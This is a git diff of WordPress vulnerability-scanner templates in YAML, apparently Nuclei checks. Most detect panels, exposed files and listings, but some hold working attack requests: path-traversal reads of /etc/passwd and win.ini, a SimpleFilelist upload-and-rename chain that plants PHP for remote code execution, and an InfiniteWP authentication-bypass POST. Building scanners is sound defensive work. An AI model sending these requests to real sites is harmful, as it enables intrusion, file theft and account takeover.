200 + - 200 \ No newline at end of file diff --git a/poc/wordpress/wordpress-emergency-script.yaml b/poc/wordpress/wordpress-emergency-script.yaml index 4a91d84f3f..40258b1a9d 100644 --- a/poc/wordpress/wordpress-emergency-script.yaml +++ b/poc/wordpress/wordpress-emergency-script.yaml @@ -1,20 +1,15 @@ id: wordpress-emergency-script - info: name: WordPress Emergency Script author: dwisiswant0 severity: info - reference: - - https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script - metadata: - max-request: 1 tags: wordpress - -http: + # Ref:- + # https://wordpress.org/support/article/resetting-your-password/#using-the-emergency-password-reset-script +requests: - method: GET path: - "{{BaseURL}}/emergency.php" - matchers-condition: and matchers: - type: word @@ -24,9 +19,6 @@ http: - "Update Options" condition: and part: body - - type: status status: - 200 - -# digest: 4b0a00483046022100823548ff856b338033f95061322ef1e6f3dca61c73c2c268b9d0fda60a190f5e022100b4e66e5dbb5334c8504b13fc514a3683072ac9f75b8a9374b6a5840b63fef336:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-git-config-11278.yaml b/poc/wordpress/wordpress-git-config-11278.yaml deleted file mode 100644 index 0ade76adee..0000000000 --- a/poc/wordpress/wordpress-git-config-11278.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: wordpress-git-config -info: - name: Wordpress Git Config - author: nerrorsec - severity: info - description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: https://hackerone.com/reports/248693 - tags: config,git,exposure,wordpress,wp-plugin,wp-theme -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/.git/config" - - "{{BaseURL}}/wp-content/themes/.git/config" - matchers-condition: and - matchers: - - type: word - words: - - "[core]" - - type: dsl - dsl: - - "!contains(tolower(body), '<html')" - - "!contains(tolower(body), '<body')" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-git-config-11279.yaml b/poc/wordpress/wordpress-git-config-11279.yaml index 2e71493a93..0ade76adee 100644 --- a/poc/wordpress/wordpress-git-config-11279.yaml +++ b/poc/wordpress/wordpress-git-config-11279.yaml @@ -1,36 +1,26 @@ id: wordpress-git-config - info: name: Wordpress Git Config author: nerrorsec severity: info description: Searches for the pattern /.git/config inside themes and plugins folder. - reference: - - https://hackerone.com/reports/248693 - metadata: - max-request: 2 - tags: hackerone,config,git,exposure,wordpress,wp-plugin,wp-theme - -http: + reference: https://hackerone.com/reports/248693 + tags: config,git,exposure,wordpress,wp-plugin,wp-theme +requests: - method: GET path: - "{{BaseURL}}/wp-content/plugins/.git/config" - "{{BaseURL}}/wp-content/themes/.git/config" - matchers-condition: and matchers: - type: word words: - "[core]" - - type: dsl dsl: - "!contains(tolower(body), '<html')" - "!contains(tolower(body), '<body')" condition: and - - type: status status: - 200 - -# digest: 490a0046304402200c85e6bde7f8fd5a418f6ae475ea3e43619b2c9bbdaa025a2ff0a3467f271cc802204e6427102c1fe622a829ec9df5831e46740d60b9bf8eec9d72ecd086068a28de:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-gotmls-detect-11280.yaml b/poc/wordpress/wordpress-gotmls-detect-11280.yaml deleted file mode 100644 index 08ee19a727..0000000000 --- a/poc/wordpress/wordpress-gotmls-detect-11280.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: wordpress-gotmls-detect - -info: - name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall - author: vsh00t - reference: https://www.exploit-db.com/exploits/50107 - severity: info - tags: wordpress,wp-plugin,gotmls - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini" - - matchers-condition: and - matchers: - - type: word - words: - - "gotmls" - part: header - - - type: status - status: - - 302 - - extractors: - - type: kval - part: header - kval: - - Location diff --git a/poc/wordpress/wordpress-gotmls-detect.yaml b/poc/wordpress/wordpress-gotmls-detect.yaml index 1dcdacb57e..bdb31dc526 100644 --- a/poc/wordpress/wordpress-gotmls-detect.yaml +++ b/poc/wordpress/wordpress-gotmls-detect.yaml @@ -1,37 +1,23 @@ id: wordpress-gotmls-detect - info: name: Detect WordPress Plugin Anti-Malware Security and Bruteforce Firewall author: vsh00t reference: https://www.exploit-db.com/exploits/50107 severity: info tags: wordpress,wp-plugin,gotmls - requests: - - payloads: - Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt - attack: sniper - threads: 100 - - raw: - - | - GET /wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini HTTP/1.1 - Host: {{Subdomains}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept-Encoding: gzip, deflate - Accept: */* - + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin-ajax.php?action={{randstr}}&file=../../../../../../../../../Windows/win.ini" matchers-condition: and matchers: - type: word words: - "gotmls" part: header - - type: status status: - 302 - extractors: - type: kval part: header diff --git a/poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml b/poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml similarity index 100% rename from poc/wordpress/wordpress-gtranslate-plugin-listing-11284.yaml rename to poc/wordpress/wordpress-gtranslate-plugin-listing-11282.yaml diff --git a/poc/wordpress/wordpress-gtranslate-plugin-listing.yaml b/poc/wordpress/wordpress-gtranslate-plugin-listing.yaml deleted file mode 100644 index 3af168a795..0000000000 --- a/poc/wordpress/wordpress-gtranslate-plugin-listing.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-gtranslate-plugin-listing -info: - name: WordPress gtranslate Plugin Directory Listing - author: dhiyaneshDK - severity: info - description: Searches for sensitive directories present in the gtranslate wordpress plugin. - reference: https://www.exploit-db.com/ghdb/6160 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/gtranslate/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/gtranslate/" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml index c48d37c9e4..88121a97b7 100644 --- a/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml +++ b/poc/wordpress/wordpress-infinitewp-auth-bypass-11287.yaml @@ -1,40 +1,25 @@ id: wordpress-infinitewp-auth-bypass - info: name: WordPress InfiniteWP Client Authentication Bypass author: princechaddha severity: critical reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ tags: wordpress,auth-bypass,wp-plugin - requests: - raw: - | GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9 - Connection: close - - | POST / HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - type: regex name: username @@ -43,7 +28,6 @@ requests: part: body regex: - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' - - type: regex name: username internal: true @@ -51,19 +35,16 @@ requests: part: header regex: - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' - matchers-condition: and matchers: - type: word words: - "wordpress_logged_in" part: header - - type: word words: - "<IWPHEADER>" - part: body - type: status status: - - 200 \ No newline at end of file + - 200 diff --git a/poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml b/poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml deleted file mode 100644 index ee41aa1a81..0000000000 --- a/poc/wordpress/wordpress-infinitewp-auth-bypass-11288.yaml +++ /dev/null @@ -1,60 +0,0 @@ -id: wordpress-infinitewp-auth-bypass -info: - name: WordPress InfiniteWP Client Authentication Bypass - author: princechaddha - severity: critical - reference: https://www.wordfence.com/blog/2020/01/critical-authentication-bypass-vulnerability-in-infinitewp-client-plugin/ - tags: wordpress,auth-bypass,wp-plugin -requests: - - raw: - - | - GET /?author=1 HTTP/1.1 - Host: {{Hostname}} - Cache-Control: max-age=0 - Upgrade-Insecure-Requests: 1 - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_2_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - - | - POST / HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 - Content-Type: application/x-www-form-urlencoded - ContentLength: 3537 - - _IWP_JSON_PREFIX_{{base64("{\"iwp_action\":\"add_site\",\"params\":{\"username\":\"§username§\"}}")}} - redirects: true - extractors: - - type: regex - name: username - internal: true - group: 1 - part: body - regex: - - 'Author:(?:[A-Za-z0-9 -\_="]+)?<span(?:[A-Za-z0-9 -\_="]+)?>([A-Za-z0-9]+)<\/span>' - - type: regex - name: username - internal: true - group: 1 - part: header - regex: - - 'ion: https:\/\/[a-z0-9.]+\/author\/([a-z]+)\/' - matchers-condition: and - matchers: - - type: word - words: - - "wordpress_logged_in" - part: header - - type: word - words: - - "<IWPHEADER>" - part: body - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-installer-log-11290.yaml b/poc/wordpress/wordpress-installer-log-11292.yaml similarity index 100% rename from poc/wordpress/wordpress-installer-log-11290.yaml rename to poc/wordpress/wordpress-installer-log-11292.yaml diff --git a/poc/wordpress/wordpress-installer-log.yaml b/poc/wordpress/wordpress-installer-log.yaml index c439cb1149..3e84e512d7 100644 --- a/poc/wordpress/wordpress-installer-log.yaml +++ b/poc/wordpress/wordpress-installer-log.yaml @@ -1,27 +1,19 @@ id: wordpress-installer-log - info: name: WordPress Installer Log author: dwisiswant0 severity: info - metadata: - max-request: 1 - tags: wordpress,log - -http: + tags: wordpress,logs +requests: - method: GET path: - "{{BaseURL}}/installer-log.txt" - matchers-condition: and matchers: - type: regex regex: - "(?mi)DUPLICATOR(-|\\s)?(PRO|LITE)?:? INSTALL-LOG" part: body - - type: status status: - 200 - -# digest: 4b0a004830460221009a8e8d042e85d58401fa09b980054470d6d83085e609c9a5696cd5a080e6e8d7022100dc240d18371ec6d9889fa793fc444b08631d656fac8d07effae6073686a03dd8:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-lfi.yaml b/poc/wordpress/wordpress-lfi.yaml deleted file mode 100644 index aea478a3f7..0000000000 --- a/poc/wordpress/wordpress-lfi.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: wordpress-LFI -info: - name: wordpress-LFI - author: 0x240x23elu - severity: High -requests: - - method: GET - path: - - "{{BaseURL}}/wp-admin/admin.php?page=supsystic-backup&tab=bupLog&download=../../../../../../../../../etc/passwd" - - "{{BaseURL}}/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd" - - "{{BaseURL}}/wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view" - - "{{BaseURL}}/wordpress/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/wordpress/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/wordpress/wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=/etc/passwd%00" - - "{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd" - - "{{BaseURL}}/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd" - matchers: - - type: regex - regex: - - "root:[x*]:0:0:" - part: body diff --git a/poc/wordpress/wordpress-login.yaml b/poc/wordpress/wordpress-login.yaml index 0372801292..7fecc16e01 100644 --- a/poc/wordpress/wordpress-login.yaml +++ b/poc/wordpress/wordpress-login.yaml @@ -1,13 +1,23 @@ id: wordpress-login + info: - name: WordPress login + name: WordPress Login Panel - Detect author: its0x08 severity: info + description: WordPress login panel was detected. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 + metadata: + max-request: 1 tags: panel,wordpress -requests: + +http: - method: GET path: - "{{BaseURL}}/wp-login.php" + matchers: - type: word words: @@ -16,3 +26,5 @@ requests: - '/wp-login.php?action=lostpassword">Lost your password?</a>' - '<form name="loginform" id="loginform" action="{{BaseURL}}/wp-login.php" method="post">' condition: or + +# digest: 4b0a0048304602210086807236a145972b89ecdaa833fe7f59fac5c4d3babd16cb539f81c3c8b6b603022100c24de61f99e5153228b3e5c418c3297c3adf10667ceb11498b4fe452e80528f7:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-plugins-detect-11298.yaml b/poc/wordpress/wordpress-plugins-detect-11298.yaml index 586ac01da2..fb3b30feac 100644 --- a/poc/wordpress/wordpress-plugins-detect-11298.yaml +++ b/poc/wordpress/wordpress-plugins-detect-11298.yaml @@ -1,35 +1,29 @@ id: wordpress-plugins-detect - info: name: WordPress Plugins Detection author: 0xcrypto severity: info tags: fuzz,wordpress - requests: - raw: - | GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 Host: {{Hostname}} - threads: 50 payloads: pluginSlug: helpers/wordlists/wordpress-plugins.txt - matchers-condition: and matchers: - type: status status: - 200 - - type: word words: - "== Description ==" - extractors: - type: regex part: body group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version diff --git a/poc/wordpress/wordpress-plugins-detect.yaml b/poc/wordpress/wordpress-plugins-detect.yaml index 93285d39f7..e6fcb6dba4 100644 --- a/poc/wordpress/wordpress-plugins-detect.yaml +++ b/poc/wordpress/wordpress-plugins-detect.yaml @@ -2,21 +2,31 @@ id: wordpress-plugins-detect info: name: WordPress Plugins Detection - author: 0xcrypto - severity: info - metadata: - max-request: 98135 + author: 0xcrypto, foulenzer + severity: high tags: fuzz,wordpress -http: +requests: - raw: - | - GET /wp-content/plugins/{{pluginSlug}}/readme.txt HTTP/1.1 + GET /wp-content/plugins/{{plugin}}/readme.txt HTTP/1.1 Host: {{Hostname}} - threads: 50 payloads: - pluginSlug: helpers/wordlists/wordpress-plugins.txt + plugin: + - contact-form-7 + - wordpress-seo + - elementor + - woocommerce + - all-in-one-wp-migration + - updraftplus + - all-in-one-seo-pack + - duplicator + - essential-addons-for-elementor-lite + - optinmonster + - w3-total-cache + - redux-framework + - ninja-forms matchers-condition: and matchers: @@ -34,6 +44,4 @@ http: group: 1 regex: - "===\\s(.*)\\s===" # extract the plugin name - - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version - -# digest: 490a0046304402203dae0e85f594434c208f2bbb49a34444932fb2bbebfc79dd5927f3a559fc28840220779c3169c962d96c2f3e567212f7919cfc7df199c2b58bc160c12eb2ab74cc7e:922c64590222798bb761d5b6d8e72950 + - "(?m)Stable tag: ([0-9.]+)" # extract the plugin version \ No newline at end of file diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml index 1bb8c02019..988a740c1c 100644 --- a/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml +++ b/poc/wordpress/wordpress-rce-simplefilelist-11299.yaml @@ -1,18 +1,25 @@ id: wordpress-rce-simplefilelist + info: - name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE + name: WordPress SimpleFilelist - Remote Code Execution author: princechaddha severity: critical - reference: https://wpscan.com/vulnerability/10192 - tags: wordpress,wp-plugin,rce + description: | + Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. + reference: + - https://wpscan.com/vulnerability/10192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cwe-id: CWE-77 + tags: wordpress,wp-plugin,rce,intrusive,upload,python + requests: - raw: - | POST /wp-content/plugins/simple-file-list/ee-upload-engine.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close - Content-Length: 693 Content-Type: multipart/form-data; boundary=6985fa39c0698d07f6d418b37388e1b2 --6985fa39c0698d07f6d418b37388e1b2 @@ -35,30 +42,32 @@ requests: Content-Disposition: form-data; name="file"; filename="nuclei.png" Content-Type: image/png - <?php echo "Nuclei - Open-source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> + <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> --6985fa39c0698d07f6d418b37388e1b2-- + - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} - User-Agent: python-requests/2.25.1 - Accept: */* - Connection: close X-Requested-With: XMLHttpRequest - Content-Length: 81 + Accept: */* Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php + - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - Connection: close + matchers-condition: and matchers: - type: word words: - - 'Nuclei - Open-source project (github.com/projectdiscovery/nuclei)' + - 'Nuclei - Open source project (github.com/projectdiscovery/nuclei)' + - "PHP Version" + - "Configuration Command" part: body + condition: and - type: word words: - 'text/html' @@ -66,3 +75,5 @@ requests: - type: status status: - 200 + +# Enhanced by mp on 2022/05/31 diff --git a/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml b/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml index 988a740c1c..9c1cffb05d 100644 --- a/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml +++ b/poc/wordpress/wordpress-rce-simplefilelist-11304.yaml @@ -1,19 +1,12 @@ id: wordpress-rce-simplefilelist - info: - name: WordPress SimpleFilelist - Remote Code Execution + name: WordPress SimpleFilelist Unauthenticated Arbitrary File Upload RCE author: princechaddha severity: critical + reference: https://wpscan.com/vulnerability/10192 description: | - Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. - reference: - - https://wpscan.com/vulnerability/10192 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H - cvss-score: 10.0 - cwe-id: CWE-77 + The Simple File List WordPress plugin was found to be vulnerable to an unauthenticated arbitrary file upload leading to remote code execution. The Python exploit first uploads a file containing PHP code but with a png image file extension. A second request is sent to move (rename) the png file to a PHP file. tags: wordpress,wp-plugin,rce,intrusive,upload,python - requests: - raw: - | @@ -44,7 +37,6 @@ requests: <?php echo "Nuclei - Open source project (github.com/projectdiscovery/nuclei)"; phpinfo(); ?> --6985fa39c0698d07f6d418b37388e1b2-- - - | POST /wp-content/plugins/simple-file-list/ee-file-engine.php HTTP/1.1 Host: {{Hostname}} @@ -53,12 +45,10 @@ requests: Content-Type: application/x-www-form-urlencoded eeSFL_ID=1&eeFileOld=nuclei.png&eeListFolder=%2F&eeFileAction=Rename%7Cnuclei.php - - | GET /wp-content/uploads/simple-file-list/nuclei.php HTTP/1.1 Host: {{Hostname}} Accept: */* - matchers-condition: and matchers: - type: word @@ -75,5 +65,3 @@ requests: - type: status status: - 200 - -# Enhanced by mp on 2022/05/31 diff --git a/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml b/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml deleted file mode 100644 index 116e5709c7..0000000000 --- a/poc/wordpress/wordpress-redirection-plugin-listing-11306.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-redirection-plugin-listing -info: - name: WordPress Redirection Plugin Directory Listing - author: dhiyaneshDk - severity: info - description: Searches for sensitive directories present in the wordpress-redirection plugin. - reference: https://www.exploit-db.com/ghdb/6436 - tags: wordpress,listing,plugin -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/plugins/redirection/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - "/wp-content/plugins/redirection/" - condition: and - - type: status - status: - - 200 diff --git a/poc/wordpress/wordpress-redirection-plugin-listing.yaml b/poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml similarity index 100% rename from poc/wordpress/wordpress-redirection-plugin-listing.yaml rename to poc/wordpress/wordpress-redirection-plugin-listing-11308.yaml diff --git a/poc/wordpress/wordpress-takeover-11311.yaml b/poc/wordpress/wordpress-takeover-11311.yaml index ce2834c9c3..a32bac0083 100644 --- a/poc/wordpress/wordpress-takeover-11311.yaml +++ b/poc/wordpress/wordpress-takeover-11311.yaml @@ -1,15 +1,15 @@ id: wordpress-takeover info: name: WordPress takeover detection - author: pdcommunity & geeknik + author: pdteam,geeknik severity: high + reference: + - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover,wordpress - reference: https://github.com/EdOverflow/can-i-take-over-xyz requests: - method: GET path: - "{{BaseURL}}" - redirects: true matchers-condition: and matchers: - type: word diff --git a/poc/wordpress/wordpress-takeover-11312.yaml b/poc/wordpress/wordpress-takeover-11312.yaml new file mode 100644 index 0000000000..ce2834c9c3 --- /dev/null +++ b/poc/wordpress/wordpress-takeover-11312.yaml @@ -0,0 +1,23 @@ +id: wordpress-takeover +info: + name: WordPress takeover detection + author: pdcommunity & geeknik + severity: high + tags: takeover,wordpress + reference: https://github.com/EdOverflow/can-i-take-over-xyz +requests: + - method: GET + path: + - "{{BaseURL}}" + redirects: true + matchers-condition: and + matchers: + - type: word + words: + - "Do you want to register" + - ".wordpress.com</em> doesn’t exist" + condition: and + - type: word + words: + - "cannot be registered" + negative: true diff --git a/poc/wordpress/wordpress-takeover-11313.yaml b/poc/wordpress/wordpress-takeover-11313.yaml deleted file mode 100644 index ab41f8ff24..0000000000 --- a/poc/wordpress/wordpress-takeover-11313.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: wordpress-takeover -info: - name: WordPress takeover detection - author: pdteam,geeknik - severity: high - tags: takeover,wordpress - reference: https://github.com/EdOverflow/can-i-take-over-xyz -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers-condition: and - matchers: - - type: word - words: - - "Do you want to register" - - ".wordpress.com</em> doesn’t exist" - condition: and - - type: word - words: - - "cannot be registered" - negative: true diff --git a/poc/wordpress/wordpress-themes-detect-11316.yaml b/poc/wordpress/wordpress-themes-detect-11316.yaml new file mode 100644 index 0000000000..5d00b07f78 --- /dev/null +++ b/poc/wordpress/wordpress-themes-detect-11316.yaml @@ -0,0 +1,22 @@ +id: wordpress-themes-detect +info: + name: WordPress Theme Detection + author: 0xcrypto + severity: info + tags: fuzz,wordpress +requests: + - raw: + - | + GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 + Host: {{Hostname}} + payloads: + themeSlug: helpers/wordlists/wordpress-themes.txt + threads: 50 + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "== Description ==" diff --git a/poc/wordpress/wordpress-themes-detect.yaml b/poc/wordpress/wordpress-themes-detect.yaml index c6f7c7a2ee..4c487c4563 100644 --- a/poc/wordpress/wordpress-themes-detect.yaml +++ b/poc/wordpress/wordpress-themes-detect.yaml @@ -2,22 +2,22 @@ id: wordpress-themes-detect info: name: WordPress Theme Detection - author: 0xcrypto - severity: info - metadata: - max-request: 24434 + author: 0xcrypto, foulenzer + severity: high tags: fuzz,wordpress -http: +requests: - raw: - | - GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 + GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1 Host: {{Hostname}} - payloads: - themeSlug: helpers/wordlists/wordpress-themes.txt - threads: 50 + theme: + - twentyfifteen + - shapely + - onepress + threads: 50 matchers-condition: and matchers: - type: status @@ -26,6 +26,4 @@ http: - type: word words: - - "== Description ==" - -# digest: 490a00463044022011e4cbe8a45d6ad61f783b572e5c03e16bb429a66bb973f1e0049de13b6aed410220067e14e44f6b612f6bdaccc4f46ec64cb7f80d843257e1e376208859ac6aac2d:922c64590222798bb761d5b6d8e72950 + - "== Description ==" \ No newline at end of file diff --git a/poc/wordpress/wordpress-themes2.yaml b/poc/wordpress/wordpress-themes2.yaml index 5d00b07f78..6a3c621ae8 100644 --- a/poc/wordpress/wordpress-themes2.yaml +++ b/poc/wordpress/wordpress-themes2.yaml @@ -1,16 +1,19 @@ id: wordpress-themes-detect info: name: WordPress Theme Detection - author: 0xcrypto - severity: info + author: 0xcrypto, foulenzer + severity: high tags: fuzz,wordpress requests: - raw: - | - GET /wp-content/themes/{{themeSlug}}/readme.txt HTTP/1.1 + GET /wp-content/themes/{{theme}}/readme.txt HTTP/1.1 Host: {{Hostname}} payloads: - themeSlug: helpers/wordlists/wordpress-themes.txt + theme: + - twentyfifteen + - shapely + - onepress threads: 50 matchers-condition: and matchers: diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml similarity index 100% rename from poc/wordpress/wordpress-total-upkeep-backup-download-11322.yaml rename to poc/wordpress/wordpress-total-upkeep-backup-download-11324.yaml diff --git a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml index 47fe8b3995..a87b8fda8d 100644 --- a/poc/wordpress/wordpress-total-upkeep-backup-download.yaml +++ b/poc/wordpress/wordpress-total-upkeep-backup-download.yaml @@ -1,27 +1,36 @@ id: wordpress-total-upkeep-backup-download + info: name: WordPress Total Upkeep Database and Files Backup Download author: princechaddha severity: high reference: - https://www.exploit-db.com/exploits/49252 - tags: wordpress,wp-plugin -requests: + metadata: + max-request: 1 + tags: wordpress,wp-plugin,edb + +http: - method: GET path: - "{{BaseURL}}/wp-content/plugins/boldgrid-backup/cron/restore-info.json" + matchers-condition: and matchers: - type: word words: - "application/json" part: header + - type: word words: - '"filepath"' - '/wp-content/boldgrid_backup_' condition: and part: body + - type: status status: - 200 + +# digest: 4a0a004730450220740af42e52a68f0d6689e8a42beeed0b3a97aae6409f3ada8410b0de03a612e5022100a5a7de364e6d563966439fb830a1e355ce145bd70d1b17e1704dd01f1911e9b0:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-updraftplus-pem-key.yaml b/poc/wordpress/wordpress-updraftplus-pem-key.yaml index fdc0197b59..60ce155fd0 100644 --- a/poc/wordpress/wordpress-updraftplus-pem-key.yaml +++ b/poc/wordpress/wordpress-updraftplus-pem-key.yaml @@ -1,20 +1,15 @@ id: updraftplus-pem-keys - info: name: UpdraftPlus Plugin Pem Key author: dhiyaneshDk severity: info reference: - https://www.exploit-db.com/ghdb/6437 - metadata: - max-request: 1 - tags: wp-plugin,edb,wordpress - -http: + tags: wordpress,wp-plugin +requests: - method: GET path: - '{{BaseURL}}/wp-content/plugins/updraftplus/includes/' - matchers-condition: and matchers: - type: word @@ -24,9 +19,6 @@ http: - "updraftplus" condition: and part: body - - type: status status: - 200 - -# digest: 4b0a00483046022100f67881c034eb94b3163dd7e7e724002d05ef5d68777ecabd4a0f6e1ddaec2b4a022100eaa8e0704e2f22d863e7eafda11a6a3fedd0088891a706f52eb74c79fa6a1a9c:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-user-enum-11330.yaml b/poc/wordpress/wordpress-user-enum-11330.yaml index 1cd64aba82..b113be4fbf 100644 --- a/poc/wordpress/wordpress-user-enum-11330.yaml +++ b/poc/wordpress/wordpress-user-enum-11330.yaml @@ -1,33 +1,24 @@ id: wordpress-user-enum - info: name: Wordpress User Enumeration author: r3dg33k severity: info - metadata: - max-request: 1 tags: wordpress - -http: +requests: - method: GET path: - "{{BaseURL}}/?author=1" - matchers-condition: and matchers: - type: regex regex: - '(?i)Location: http(s|):\/\/[\w\.\-]+\/author\/\w+' part: header - - type: status status: - 301 - extractors: - type: regex part: header regex: - 'author\/\w+' - -# digest: 4a0a00473045022100a9bd51a7335e4a3132dc7adf1b5faad143902b92a257ce67c7554206bb1208e60220524362849327f5644ce5e078f58218d5ed17ceaa3b90982ac8eb73b44b8348d5:922c64590222798bb761d5b6d8e72950 diff --git a/poc/wordpress/wordpress-weak-credentials-11336.yaml 